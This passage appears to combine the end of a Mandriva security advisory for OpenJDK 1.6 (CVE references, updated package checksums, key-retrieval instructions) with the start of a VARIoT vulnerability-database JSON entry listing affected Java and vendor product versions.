References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431 http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-April/022796.html http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0124 https://bugzilla.redhat.com/show_bug.cgi?id=952387
Updated Packages:
Mandriva Enterprise Server 5: 28320f10570a50ac08575480ee249aed mes5/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm 5a6bf000d48cb35a304f9ec7d4f83d6c mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm 966a2d2681441d30ec9d86f3d93c5a32 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm 280aee290b6d68ab5e994f8a25a50ad9 mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm 6893259a988e94df07274bf728cc7675 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm f3d20af548c84815b6c1636273293273 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 0b253fd82c86e16848eff6d5f9591ce6 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm 08d1a5099ab26a89b1dae8008e0d98e6 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm c0433e439964af42aa82371901aa07bc mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm 5e77c039c2d64220d1cf3fce44c86f24 mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm 4dd6c3dbabf6d29cf3ce751bda74f483 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm f3d20af548c84815b6c1636273293273 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFRcSLkmqjQ0CJFipgRAsEgAJ4gHSUUcP7uDS3JIxzQZxnCLwXe1QCfTQXq o4NG1rmFdAUfR4q/O/aHdtM= =EXuM -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201304-0300", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "one-x client enablement service sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "nonstop server h06.16.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "intelligent operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "nonstop server h06.19.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "one-x client enablement service sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "maximo asset management essentials", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "nonstop server j06.08.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.15.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "websphere cast iron cloud integration virtual applianc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "nonstop server j06.06.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "02-00" }, { "model": "nonstop server j06.14", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "virtualization engine ts7700", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.31.0.89" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-70" }, { "model": "websphere cast iron cloud integration studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus notes fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "nonstop server j06.09.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.26", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "nonstop server j06.04.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus domino fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.6" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "nonstop server j06.13", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "intelligent operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "nonstop server j06.09.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "linux enterprise server sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "one-x client enablement service", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nonstop server h06.18.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.22.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "websphere cast iron cloud integration physical applian", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 